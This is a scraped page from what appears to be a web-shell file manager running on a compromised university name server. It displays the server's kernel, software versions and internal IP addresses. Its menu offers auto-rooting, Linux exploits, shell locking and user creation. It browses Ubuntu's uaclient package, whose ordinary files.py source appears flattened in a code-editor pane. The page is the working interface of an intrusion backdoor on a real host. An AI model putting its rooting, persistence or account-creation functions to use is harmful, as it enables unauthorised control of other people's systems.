Linux ns1.utparral.edu.mx 6.8.0-79-generic #79~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Aug 15 16:54:53 UTC 2 x86_64
Apache/2.4.58 (Unix) OpenSSL/1.1.1w PHP/8.2.12 mod_perl/2.0.12 Perl/v5.34.1
: 10.10.1.9 | : 10.10.1.254
Cant Read [ /etc/named.conf ]
daemon
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
README
+ Create Folder
+ Create File
/
usr /
lib /
python3 /
dist-packages /
uaclient /
files /
[ HOME SHELL ]
Name
Size
Permission
Action
__pycache__
[ DIR ]
drwxr-xr-x
data_types.py
2.68
KB
-rw-r--r--
files.py
2.63
KB
-rw-r--r--
__init__.py
369
B
-rw-r--r--
machine_token.py
8.91
KB
-rw-r--r--
notices.py
8.46
KB
-rw-r--r--
state_files.py
6.62
KB
-rw-r--r--
user_config_file.py
5.63
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : files.py
import json import logging import os from typing import Any, Dict, Optional from uaclient import defaults, event_logger, exceptions, system, util event = event_logger.get_event_logger() LOG = logging.getLogger(util.replace_top_level_logger_name(__name__)) class UAFile: def __init__( self, name: str, directory: str = defaults.DEFAULT_DATA_DIR, private: bool = True, ): self._directory = directory self._file_name = name self._is_private = private self._path = os.path.join(self._directory, self._file_name) @property def path(self) -> str: return self._path @property def is_private(self) -> bool: return self._is_private @property def is_present(self): return os.path.exists(self.path) def write(self, content: str): file_mode = ( defaults.ROOT_READABLE_MODE if self.is_private else defaults.WORLD_READABLE_MODE ) # try/except-ing here avoids race conditions the best try: if os.path.basename(self._directory) == defaults.PRIVATE_SUBDIR: os.makedirs(self._directory, mode=0o700) else: os.makedirs(self._directory) except OSError: pass system.write_file(self.path, content, file_mode) def read(self) -> Optional[str]: content = None try: content = system.load_file(self.path) except FileNotFoundError: LOG.debug("Tried to load %s but file does not exist", self.path) return content def delete(self): system.ensure_file_absent(self.path) class ProJSONFile: def __init__( self, pro_file: UAFile, ): self.pro_file = pro_file def write(self, content: Dict[str, Any]): self.pro_file.write( content=json.dumps(content, cls=util.DatetimeAwareJSONEncoder) ) def read(self) -> Optional[Dict[str, Any]]: content = self.pro_file.read() if content: try: return json.loads(content, cls=util.DatetimeAwareJSONDecoder) except json.JSONDecodeError as e: raise exceptions.InvalidJson( source=self.pro_file.path, out="\n" + str(e) ) return None def delete(self): return self.pro_file.delete() @property def is_present(self): return self.pro_file.is_present class UserCacheFile(UAFile): def __init__(self, name: str): super().__init__( name, directory=system.get_user_cache_dir(), private=False )
Close